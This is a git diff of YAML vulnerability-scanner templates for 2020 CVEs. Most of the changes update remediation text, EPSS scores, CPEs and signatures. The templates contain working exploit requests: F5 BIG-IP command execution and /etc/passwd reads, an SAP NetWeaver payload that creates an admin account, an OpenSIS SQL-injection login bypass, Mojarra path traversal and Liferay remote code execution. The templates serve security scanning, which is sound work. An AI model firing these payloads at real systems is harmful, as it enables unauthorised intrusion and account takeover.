remediation: | + Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI. reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html @@ -22,11 +24,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-5902 - cwe-id: CWE-22,CWE-829 - epss-score: 0.97562 - tags: cve2020,bigip,rce,kev,packetstorm,cve + cwe-id: CWE-22 + epss-score: 0.97559 + epss-percentile: 0.99997 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 + vendor: f5 + product: big-ip_access_policy_manager + tags: cve2020,bigip,rce,kev,packetstorm,cve http: - method: GET @@ -38,10 +44,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" @@ -50,6 +52,10 @@ http: - "HSQL Database Engine Servlet" condition: or + - type: status + status: + - 200 + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 @@ -74,12 +80,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "h3ll0_w0Rld" -# Enhanced by mp on 2022/04/28 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100dd866300300b97f2eef08d5e70e6ffeffb544cc1062458d164ff3638e8e298710221008c9662d2d17e044260d69bac73a4ad5f226505fb8b6e3c77acb2ef7dbb5c7a94:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 00f079e6e5..163fcc94d4 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6171 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-6171 cwe-id: CWE-79 - cpe: cpe:2.3:a:communilink:clink_office:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: cve,cve2020,xss,clink-office + epss-percentile: 0.48476 + cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: communilink + product: clink_office + tags: cve,cve2020,xss,clink-office http: - method: GET @@ -28,17 +33,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 4b0a004830460221009de2a98d5ceb1e22fc39692f1d091254f1f6d8e9629ff5825d6f5640abb7edfa022100b0d368569b1f6964c975950ab7d81f69b71d447a3fff08f5df79b6a02be42e60:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index c5fc974f09..13f8c80e49 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -5,6 +5,8 @@ info: author: _generic_human_ severity: critical description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. + remediation: | + Apply the latest security patches provided by SAP to mitigate this vulnerability. reference: - https://launchpad.support.sap.com/#/notes/2890213 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305 @@ -18,11 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6207 cwe-id: CWE-306 - cpe: cpe:2.3:a:sap:solution_manager:*:*:*:*:*:*:*:* - epss-score: 0.97442 - tags: cve,cve2020,sap,solman,rce,kev + epss-score: 0.97421 + epss-percentile: 0.9991 + cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: solution_manager + tags: cve,cve2020,sap,solman,rce,kev http: - raw: @@ -38,22 +43,22 @@ http: matchers-condition: and matchers: - type: word + part: body words: - ":Envelope" - ":Body" - ":getAllAgentInfoResponse" - part: body + condition: and + + - type: word + part: header + words: + - "text/xml" + - "SAP NetWeaver Application Server" condition: and - type: status status: - 200 - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header - condition: and - -# Enhanced by mp on 2022/04/29 +# digest: 4b0a00483046022100e60f5abb3989de667f74a792be6630653b3d378322e1f9b564f03fe97a9fb4ea022100d2c65536339691262592d5afbb3eb617c3aba8bee3c59714e4bbbc2567249a9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index cacfa9b87a..42dad00e06 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. + remediation: | + Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability. reference: - https://launchpad.support.sap.com/#/notes/2934135 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 @@ -16,12 +18,15 @@ info: cvss-score: 10 cve-id: CVE-2020-6287 cwe-id: CWE-306 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:* - epss-score: 0.97362 + epss-score: 0.97274 + epss-percentile: 0.99801 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2020,sap,kev,cisa + tags: cve,cve2020,sap,kev http: - raw: @@ -35,26 +40,25 @@ http: CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== userDetails - # userName - sapRpoc6351 - # password - Secure!PwD8890 - matchers-condition: and matchers: - type: word + part: body words: - "CTCWebServiceSi" - "SOAP-ENV" - part: body condition: and + - type: word + part: header + words: + - "text/xml" + - "SAP NetWeaver Application Server" + - type: status status: - 200 - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header - -# Enhanced by mp on 2022/04/29 +# userName - sapRpoc6351 +# password - Secure!PwD8890 +# digest: 4a0a00473045022024c98acac06f56c9decc458c80e1a29e86127f9d65e824c25dc6889a749d2167022100f024cd6e263b787a3c3cdc2c477c73ba5f596baef4de35d554a6192b847657f9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 92ddcbc79d..fdc61782b3 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests. + remediation: | + Apply the relevant security patches provided by SAP to mitigate this vulnerability. reference: - https://github.com/InitRoot/CVE-2020-6308-PoC - https://launchpad.support.sap.com/#/notes/2943844 @@ -16,11 +18,14 @@ info: cvss-score: 5.3 cve-id: CVE-2020-6308 cwe-id: CWE-918 - cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:*:*:*:*:*:*:*:* - epss-score: 0.00264 - tags: cve,cve2020,sap,ssrf,oast,unauth + epss-score: 0.00306 + epss-percentile: 0.66467 + cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: businessobjects_business_intelligence_platform + tags: cve,cve2020,sap,ssrf,oast,unauth http: - raw: @@ -43,4 +48,4 @@ http: words: - "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp" -# Enhanced by md on 2023/04/04 +# digest: 490a0046304402206105ad0cec7386d6fd4d4e11ee2f60f8d7726160bc29f45461bc201c0d38d51e0220124d09e86a4846d044f16f6f350ed98c885fd3142ca8d373cda03529d56214d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 5430af2e17..59e0aaf7e3 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -5,20 +5,26 @@ info: author: pikpikcu severity: critical description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. + remediation: | + Apply the latest security patch or upgrade to a patched version of OpenSIS. reference: - https://cinzinga.com/CVE-2020-6637/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://sourceforge.net/projects/opensis-ce/files/ - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8 + - https://opensis.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-6637 cwe-id: CWE-89 - cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* - epss-score: 0.02214 + epss-score: 0.02003 + epss-percentile: 0.87604 + cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 + vendor: os4ed + product: opensis shodan-query: http.title:"openSIS" tags: cve,cve2020,sqli,opensis @@ -28,11 +34,13 @@ http: - '{{BaseURL}}/account/index.php' - '{{BaseURL}}/opensis/index.php' - '{{BaseURL}}/index.php' - headers: - Content-Type: application/x-www-form-urlencoded + body: | USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log= + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word @@ -41,6 +49,7 @@ http: - 'SQL STATEMENT:' - "UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')" condition: and + - type: word part: header words: @@ -51,4 +60,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/29 +# digest: 4b0a00483046022100db9a8815acba29c82b5e77cb1725cad9fbde5f4aecf7522c87ec639405cf8734022100a87b0eaca39faa71e15c970ac3e3e5e8cd904485b3c0b6012943e0119db3208d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml new file mode 100644 index 0000000000..b87f73d0a6 --- /dev/null +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-6950 + +info: + name: Eclipse Mojarra - Local File Read + author: iamnoooob,pdresearch + severity: medium + description: | + Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter. + reference: + - https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741 + - https://github.com/eclipse-ee4j/mojarra/issues/4571 + - https://nvd.nist.gov/vuln/detail/CVE-2020-6950 + - https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943 + - https://www.oracle.com/security-alerts/cpuapr2022.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2020-6950 + cwe-id: CWE-22 + epss-score: 0.0447 + epss-percentile: 0.9148 + cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 4 + vendor: eclipse + product: mojarra + shodan-query: html:"javax.faces.resource" + fofa-query: body="javax.faces.ViewState" + tags: cve,cve2020,mojarra,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF" + - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF" + - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF" + - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "application/xml")' + - 'contains_all(body, "") || contains_all(body, "")' + condition: and + +# digest: 4a0a004730450221008be5b3724f48624d271469896537b0bf7bed2d0d106f1a6e27bd5a399e740e9802207d6d5ac72957febb613575724354494bb5552403c720b61e77d7561d6b20eb85:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index c8ff4df5a1..c6bf9eb41b 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -6,22 +6,27 @@ info: severity: medium description: | WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.8.30. reference: - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33 - https://wordpress.org/plugins/ultimate-faqs/ - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php - https://nvd.nist.gov/vuln/detail/CVE-2020-7107 - remediation: Fixed in version 1.8.30. + - https://wordpress.org/plugins/ultimate-faqs/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-7107 cwe-id: CWE-79 - cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:*:*:* epss-score: 0.00517 + epss-percentile: 0.74091 + cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: etoilewebdesign + product: ultimate_faq + framework: wordpress tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp http: @@ -47,4 +52,4 @@ http: status: - 200 -# Enhanced by md on 2023/03/28 +# digest: 4a0a0047304502210083accc54706dde64677da22b0316498fead06ceb578b9c1d49e2c2f88f0352d202206a64a9b5ec13d147c27e0b17e60990b30e1e6f047504b1dc3ecade69d9f79395:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 59ae10f023..76daba152e 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -5,22 +5,25 @@ info: author: gy741 severity: critical description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. + remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). reference: - https://www.tenable.com/security/research/tra-2020-02 - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - https://nvd.nist.gov/vuln/detail/CVE-2020-7136 - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 + epss-score: 0.21561 + epss-percentile: 0.95888 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* - epss-score: 0.04874 - tags: cve,cve2020,hp,auth-bypass,hpe,tenable metadata: max-request: 2 + vendor: hpe + product: smart_update_manager + tags: cve,cve2020,hp,auth-bypass,hpe,tenable http: - raw: @@ -31,7 +34,6 @@ http: Content-Type: application/json {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}} - - | GET /session/{{sessionid}}/node/index HTTP/1.1 Host: {{Hostname}} @@ -49,9 +51,9 @@ http: - type: regex name: sessionid group: 1 - internal: true - part: body regex: - '"sessionId":"([a-z0-9.]+)"' + internal: true + part: body -# Enhanced by mp on 2022/04/29 +# digest: 4b0a00483046022100e9202aa857de0c5d0fde571ca9c1d38f4be261ac0533ebcf0c86ac75909e773b0221008657c84693ebfc90312b59751326fb635679fa5faac6df17c3e587a0abd97d1e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 0989f3e30f..ac5072343c 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: critical description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution. + remediation: This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html @@ -12,16 +13,18 @@ info: - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html - https://nvd.nist.gov/vuln/detail/CVE-2020-7209 - remediation: This is resolved in release 6.0-2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 + epss-score: 0.97171 + epss-percentile: 0.99737 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* - epss-score: 0.97348 - tags: cve,cve2020,rce,packetstorm metadata: max-request: 1 + vendor: hp + product: linuxki + tags: cve,cve2020,rce,packetstorm http: - method: GET @@ -31,9 +34,8 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/04/29 +# digest: 4a0a0047304502202c0d59cd9945e4cca267c0778bdb08d8e7bb76bdb23dc05320fb3a975e582551022100d3b042f6c9ec3afe51481dbe2dd9e1571efb01d4d5c52e352eae43742366b8f6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 7f3224778a..84d0f5baa3 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://nvd.nist.gov/vuln/detail/CVE-2020-7318 + remediation: | + Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 classification: @@ -17,11 +19,14 @@ info: cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 - cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* epss-score: 0.00051 - tags: cve,cve2020,xss,mcafee + epss-percentile: 0.17964 + cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mcafee + product: epolicy_orchestrator + tags: cve,cve2020,xss,mcafee http: - raw: @@ -32,18 +37,20 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: header words: - "text/html" - part: header + - type: word + part: body words: - "Policy Name" - "'\">" condition: and - part: body -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100a6978895a6facd64605a2d1763f9500bb27977547ff47b247a90fb1a8195c138022036b65b59b8838e7bc2b012566d045d17552409ce96c956a3d72b46c6dacdf214:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 9b8daaa2e1..c746568672 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled. + remediation: | + Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability. reference: - https://www.adminxe.com/2183.html - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 @@ -14,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 + epss-score: 0.72496 + epss-percentile: 0.97728 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - epss-score: 0.70272 - tags: cve,cve2020,zimbra,ssrf,oast metadata: max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + tags: cve,cve2020,zimbra,ssrf,oast http: - raw: @@ -32,4 +37,4 @@ http: words: - "http" -# Enhanced by mp on 2022/04/29 +# digest: 490a00463044022047c1293fb2b88301d1ef9497a3cc298221d81cc0d484edd7a174596b238010f102207c546eb4cb2b1c304a92e5651a272402cfae735caaeacafe9816b4028143a396:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index 4db2a59a02..f0df40b15a 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed. + remediation: | + Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected. reference: - https://puppet.com/security/cve/CVE-2020-7943 - https://tickets.puppetlabs.com/browse/PDB-4876 @@ -14,11 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-7943 - cwe-id: CWE-276 - epss-score: 0.02202 - tags: cve,cve2020,puppet,exposure,puppetdb + cwe-id: CWE-276,NVD-CWE-noinfo + epss-score: 0.08018 + epss-percentile: 0.93576 + cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: puppet + product: puppet_enterprise + tags: cve,cve2020,puppet,exposure,puppetdb http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: @@ -41,4 +46,5 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/28 + +# digest: 490a00463044022078a0d030f10cf9201a7cd5ebed37c9bfc2dfeba53e0119902b9263d3b213bf9d0220660f564f60b83c853f20c4c929769bd6e4f98b60caf855f439008e3ed16c7851:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index ba5cca5d7d..acdd4c5f6e 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -5,21 +5,27 @@ info: author: dwisiswant0 severity: critical description: Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). + remediation: | + Upgrade Liferay Portal to version 7.2.1 CE GA2 or later to mitigate the vulnerability. reference: - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 - https://nvd.nist.gov/vuln/detail/CVE-2020-7961 + - http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7961 cwe-id: CWE-502 - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - epss-score: 0.97464 - tags: cve,cve2020,rce,liferay,kev + epss-score: 0.97414 + epss-percentile: 0.99906 + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 + vendor: liferay + product: liferay_portal + tags: packetstorm,cve,cve2020,rce,liferay,kev http: - raw: @@ -30,21 +36,20 @@ http: Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData cmd2: {{command}} - 